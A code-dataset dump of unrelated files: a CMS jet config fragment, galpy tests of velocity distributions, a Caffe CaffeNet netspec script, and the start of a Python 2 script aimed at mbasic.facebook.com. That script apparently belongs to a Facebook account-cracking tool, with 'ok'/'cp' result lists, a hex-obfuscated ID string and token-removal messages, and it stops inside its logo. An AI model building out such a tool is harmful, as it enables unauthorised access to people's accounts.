jetEtMin = cms.double(15.),
jet2EtMax = cms.double(100.),
jet3EtMax = cms.double(50.),
photonTriggers = cms.vstring(''), #HLT_Photon20_*, HLT_Photon135*'),
jetTriggers = cms.vstring(''), #HLT_Jet30*'),
writeTriggerPrescale= cms.bool(False),
doPFJets = cms.bool(True),
doGenJets = cms.bool(True),
debug = cms.untracked.int32(0),
debugHLTTrigNames = cms.untracked.int32(2),
workOnAOD = cms.int32(0)
)
| StarcoderdataPython |
1750623 | # Tests of the quasiisothermaldf module
from __future__ import print_function, division
import numpy
#fiducial setup uses these
from galpy.potential import MWPotential, vcirc, omegac, epifreq, verticalfreq
from galpy.actionAngle import actionAngleAdiabatic, actionAngleStaeckel
from galpy.df import quasiisothermaldf
aAA= actionAngleAdiabatic(pot=MWPotential,c=True)
aAS= actionAngleStaeckel(pot=MWPotential,c=True,delta=0.5)
def test_pvRvT_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for adiabatic actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for adiabatic actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for adiabatic actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for adiabatic actions'
return None
def test_pvRvT_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
return None
def test_pvRvT_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
#ngl=10
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=10) for vt in vTs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
#ngl=24
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=40) for vt in vTs] for vr in vRs])
mvR= numpy.sum(tvR*pvRvT)/numpy.sum(pvRvT)
mvT= numpy.sum(tvT*pvRvT)/numpy.sum(pvRvT)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvT)/numpy.sum(pvRvT)-mvR**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvRvT)/numpy.sum(pvRvT)-mvT**2.)
svRvT= (numpy.sum(tvR*tvT*pvRvT)/numpy.sum(pvRvT)-mvR*mvT)/svR/svT
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvRvT not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(qdf.sigmaR2(R,z))) < 0.01, 'sigma vR calculated from pvRvT not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvRvT not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svRvT) < 0.01, 'correlation between vR and vT calculated from pvRvT not equal to zero for staeckel actions'
#ngl=11, shouldn't work
try:
pvRvT= numpy.array([[qdf.pvRvT(vr,vt,R,z,ngl=11) for vt in vTs] for vr in vRs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvTvz_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vTs= numpy.linspace(0.,1.5,51)
vzs= numpy.linspace(-1.,1.,21)
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z) for vt in vTs] for vz in vzs])
tvT= numpy.tile(vTs,(len(vzs),1))
tvz= numpy.tile(vzs,(len(vTs),1)).T
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for adiabatic actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for adiabatic actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for adiabatic actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for adiabatic actions'
return None
def test_pvTvz_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vzs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z) for vt in vTs] for vz in vzs])
tvz= numpy.tile(vzs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vzs),1))
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
return None
def test_pvTvz_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vzs= numpy.linspace(-1.,1.,21)
vTs= numpy.linspace(0.,1.5,51)
#ngl=10
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=10) for vt in vTs] for vz in vzs])
tvz= numpy.tile(vzs,(len(vTs),1)).T
tvT= numpy.tile(vTs,(len(vzs),1))
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
#ngl=24
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=40) for vt in vTs] for vz in vzs])
mvz= numpy.sum(tvz*pvTvz)/numpy.sum(pvTvz)
mvT= numpy.sum(tvT*pvTvz)/numpy.sum(pvTvz)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvTvz)/numpy.sum(pvTvz)-mvz**2.)
svT= numpy.sqrt(numpy.sum(tvT**2.*pvTvz)/numpy.sum(pvTvz)-mvT**2.)
svTvz= (numpy.sum(tvz*tvT*pvTvz)/numpy.sum(pvTvz)-mvz*mvT)/svz/svT
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(mvT-qdf.meanvT(R,z)) < 0.01, 'mean vT calculated from pvTvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(qdf.sigmaz2(R,z))) < 0.01, 'sigma vz calculated from pvTvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(numpy.log(svT)-0.5*numpy.log(qdf.sigmaT2(R,z))) < 0.01, 'sigma vT calculated from pvTvz not equal to that from sigmaT2 for staeckel actions'
assert numpy.fabs(svTvz) < 0.01, 'correlation between vz and vT calculated from pvTvz not equal to zero for staeckel actions'
#ngl=11, shouldn't work
try:
pvTvz= numpy.array([[qdf.pvTvz(vt,vz,R,z,ngl=11) for vt in vTs] for vz in vzs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvRvz_adiabatic():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAA,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for adiabatic actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for adiabatic actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for adiabatic actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for adiabatic actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
return None
def test_pvRvz_staeckel():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
return None
def test_pvRvz_staeckel_diffngl():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
vRs= numpy.linspace(-1.,1.,21)
vzs= numpy.linspace(-1.,1.,21)
#ngl=10
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=10) for vz in vzs] for vr in vRs])
tvR= numpy.tile(vRs,(len(vzs),1)).T
tvz= numpy.tile(vzs,(len(vRs),1))
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
sR2= qdf.sigmaR2(R,z) #direct calculation
sz2= qdf.sigmaz2(R,z)
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
#ngl=24
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=40) for vz in vzs] for vr in vRs])
mvR= numpy.sum(tvR*pvRvz)/numpy.sum(pvRvz)
mvz= numpy.sum(tvz*pvRvz)/numpy.sum(pvRvz)
svR= numpy.sqrt(numpy.sum(tvR**2.*pvRvz)/numpy.sum(pvRvz)-mvR**2.)
svz= numpy.sqrt(numpy.sum(tvz**2.*pvRvz)/numpy.sum(pvRvz)-mvz**2.)
svRvz= (numpy.sum(tvR*tvz*pvRvz)/numpy.sum(pvRvz)-mvR*mvz)/svR/svz
assert numpy.fabs(mvR) < 0.01, 'mean vR calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(mvz) < 0.01, 'mean vz calculated from pvRvz not equal to zero for staeckel actions'
assert numpy.fabs(numpy.log(svR)-0.5*numpy.log(sR2)) < 0.01, 'sigma vR calculated from pvRvz not equal to that from sigmaR2 for staeckel actions'
assert numpy.fabs(numpy.log(svz)-0.5*numpy.log(sz2)) < 0.01, 'sigma vz calculated from pvRvz not equal to that from sigmaz2 for staeckel actions'
assert numpy.fabs(svRvz-qdf.sigmaRz(R,z)/numpy.sqrt(sR2*sz2)) < 0.01, 'correlation between vR and vz calculated from pvRvz not equal to zero for adiabatic actions'
#ngl=11, shouldn't work
try:
pvRvz= numpy.array([[qdf.pvRvz(vr,vz,R,z,ngl=11) for vz in vzs] for vr in vRs])
except ValueError: pass
else: raise AssertionError('pvz w/ ngl=odd did not raise ValueError')
return None
def test_pvRvz_staeckel_arrayin():
qdf= quasiisothermaldf(1./4.,0.2,0.1,1.,1.,
pot=MWPotential,aA=aAS,cutcounter=True)
R,z= 0.8, 0.1
pvRvz= qdf.pvRvz(0.1*numpy.ones(2),0.05*numpy.ones(2),R*numpy.ones(2),z*numpy.ones(2))
assert numpy.all(numpy.fabs(numpy.log(pvRvz)-numpy.log(qdf.pvRvz(0.1,0.05,R,z))) < 10.**-10.), 'pvRvz calculated with R and z array input does not equal to calculated with scalar input'
return None
| StarcoderdataPython |
3251938 | import _init_paths
import os
import os.path as osp
import caffe
from caffe import layers as L, params as P
from caffe import tools
from caffe.model_libs import *
def caffenet_body(net, data, post, is_train):
# the net itself
net['conv1'+post], net['relu1'+post] = conv_relu(net[data], 11, 96, stride=4, is_train=is_train)
net['pool1'+post] = max_pool(net['relu1'+post], 3, stride=2)
net['norm1'+post] = L.LRN(net['pool1'+post], local_size=5, alpha=1e-4, beta=0.75, engine=P.LRN.CAFFE)
net['conv2'+post], net['relu2'+post] = conv_relu(net['norm1'+post], 5, 256, pad=2, group=2, is_train=is_train)
net['pool2'+post] = max_pool(net['relu2'+post], 3, stride=2)
net['norm2'+post] = L.LRN(net['pool2'+post], local_size=5, alpha=1e-4, beta=0.75, engine=P.LRN.CAFFE)
net['conv3'+post], net['relu3'+post] = conv_relu(net['norm2'+post], 3, 384, pad=1, is_train=is_train)
net['conv4'+post], net['relu4'+post] = conv_relu(net['relu3'+post], 3, 384, pad=1, group=2, is_train=is_train)
net['conv5'+post], net['relu5'+post] = conv_relu(net['relu4'+post], 3, 256, pad=1, group=2, is_train=is_train)
net['pool5'+post] = max_pool(net['relu5'+post], 3, stride=2)
net['fc6'+post], net['relu6'+post] = fc_relu(net['pool5'+post], 4096, is_train=is_train)
net['drop6'+post] = L.Dropout(net['relu6'+post], in_place=True)
net['fc7'+post], net['relu7'+post] = fc_relu(net['drop6'+post], 4096, is_train=is_train)
net['drop7'+post] = L.Dropout(net['relu7'+post], in_place=True)
#n.score = L.InnerProduct(n.drop7, num_output=20, weight_filler=dict(type='gaussian', std=0.01))
#n.loss = L.SigmoidCrossEntropyLoss(n.score, n.label)
final = 'drop7'+post
return net, final
# main netspec wrapper
def caffenet_train(mean_value, list_file, is_train=True):
# setup the python data layer
net = caffe.NetSpec()
net.data, net.label \
= L.ReidData(transform_param=dict(mirror=True,crop_size=227,mean_value=mean_value),
reid_data_param=dict(source=list_file,batch_size=128,new_height=256,new_width=256,
pos_fraction=1,neg_fraction=1,pos_limit=1,neg_limit=4,pos_factor=1,neg_factor=1.01),
ntop = 2)
net, final = caffenet_body(net, 'data', '', is_train)
net['score'] = fc_relu(net[final], nout=751, is_train=is_train, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=is_train, has_relu=False)
net['loss'] = L.SoftmaxWithLoss(net['score'], net['label'] , propagate_down=[1,0], loss_weight=1)
net['loss_dif'] = L.SoftmaxWithLoss(net['score_dif'], net['label_dif'], propagate_down=[1,0], loss_weight=0.5)
return str(net.to_proto())
def caffenet_dev(data_param = dict(shape=dict(dim=[2, 3, 227, 227])), label_param = dict(shape=dict(dim=[2]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = data_param)
net['label'] = L.Input(input_param = label_param)
net, final = caffenet_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=False, has_relu=False)
return str(net.to_proto())
def caffenet_score(input_param = dict(shape=dict(dim=[1, 3, 227, 227]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = input_param)
net, final = caffenet_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['prediction'] = L.Softmax(net['score'])
return str(net.to_proto())
workdir = osp.join(osp.dirname(__file__), 'caffenet')
if not os.path.isdir(workdir):
os.makedirs(workdir)
logdir = osp.join(workdir, 'log')
if not os.path.isdir(logdir):
os.makedirs(logdir)
snapshotdir = osp.join(workdir, 'snapshot')
if not os.path.isdir(snapshotdir):
os.makedirs(snapshotdir)
print('Work Dir : {}'.format(workdir))
train_proto = osp.join(workdir, "train.proto")
solverproto = tools.CaffeSolver(trainnet_prototxt_path = train_proto, testnet_prototxt_path = None)
solverproto.sp['display'] = "20"
solverproto.sp['base_lr'] = "0.001"
solverproto.sp['stepsize'] = "16000"
solverproto.sp['max_iter'] = "18000"
solverproto.sp['snapshot'] = "2000"
solverproto.sp['snapshot_prefix'] = "\"{}/snapshot/caffenet.full\"".format(workdir)
solverproto.write(osp.join(workdir, 'solver.proto'))
list_file = 'examples/market1501/lists/train.lst'
mean_value = [97.8286, 99.0468, 105.606]
# write train net.
with open(train_proto, 'w') as f:
f.write(caffenet_train(mean_value, list_file, True))
dev_proto = osp.join(workdir, "dev.proto")
with open(dev_proto, 'w') as f:
f.write(caffenet_score())
dep_proto = osp.join(workdir, "deploy.proto")
with open(dep_proto, 'w') as f:
f.write(caffenet_dev())
| StarcoderdataPython |
1622996 | <gh_stars>0
#!/usr/bin/python2
#coding=utf-8
#================
#OPEN SOURCE :)
#AUTOR : ☆ RAKA ☆ ™︻®╤───────═◍➤
#GITHUB : Bangsat-XD
#================
import os
try:
import concurrent.futures
except ImportError:
print "\033[93;1m\n FUTURES MODULE NOT INSRALL...!"
os.system("pip install futures" if os.name == "nt" else "pip2 install futures")
try:
import concurrent.futures
except ImportError:
print "\033[93;1m\n BS4 MODULE NOT INSRALL...!"
os.system("pip install bs4" if os.name == "nt" else "pip2 install bs4")
try:
import requests
except ImportError:
print "\033[93;1m\n MECHANIZE MODULE NOT INSRALL...!"
os.system("pip install mechanize" if os.name == "nt" else "pip2 install mechanize")
try:
import requests
except ImportError:
print "\033[93;1m\n REQUESTS MODULE NOT INSRALL...!"
os.system("pip install requests" if os.name == "nt" else "pip2 install requests")
import requests, os, re, bs4, sys, json, time, random, datetime
from concurrent.futures import ThreadPoolExecutor as axim_xau
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
tarikh = ["JANUARY", "FEBRUARY", "MARCH", "APRIL", "MAY", "JUNE", "JULY", "AUGUST", "SEPTEMBER", "OCTOBER", "NOVEMBER", "DECEMBER"]
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = tarikh[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
P = "\033[97;1m" # White
M = "\033[91;1m" # Red
H = "\033[92;1m" # Green
K = "\033[93;1m" # Yellow
B = "\033[94;1m" # Blue
U = "\033[95;1m" # Purple
O = "\033[92;1m" # Light blue
#N = "\033[0m" # Color Off
N = "\033[93;1m"
my_color = [
P, M, H, K, B, U, O, N]
color = random.choice(my_color)
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
user_agentz_qu = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.198 Mobile Safari/537.36 Instagram 192.168.3.11.245 Android (29/10; 420dpi; 1080x2042; samsung; SM-G973F; beyond1; exynos9820; en_GB; 256099204)", "\x31\x30\x30\x30\x34\x35\x32\x30\x33\x38\x35\x35\x32\x39\x34"]
usera_gent=(user_agentz_qu[2])
url = "https://mbasic.facebook.com"
tarikh_ttl = {"01": "JANUARY", "02": "FEBRUARY", "03": "MARCH", "04": "APRIL", "05": "MAY", "06": "JUNE", "07": "JULY", "08": "AUGUST", "09": "SEPTEMBER", "10": "OCTOBER", "11": "NOVEMBER", "12": "DECEMBER"}
def xox(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def tod():
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
print '\r %s[%s+%s] REMOVE TOKEN %s'%(N,M,N,x),
sys.stdout.flush()
time.sleep(1)
def logo():
os.system("clear")
print("""\033[1;97m
\033[1;91m───▄▀▀▀▄▄▄▄▄▄▄▀▀▀▄───
───█▒▒░░░░░░░░░▒▒█───
────█░░█░░░░░█░░█────
─▄▄──█░░░▀█▀░░░█──▄▄─
█░░█─▀▄░░░░░░░▄▀─█░░█
\033[1;96m█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█░░╦─╦╔╗╦─╔╗╔╗╔╦╗╔╗░░█
█░░║║║╠─║─║─║║║║║╠─░░█
█░░╚╩╝╚╝╚╝╚╝╚╝╩─╩╚╝░░█
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
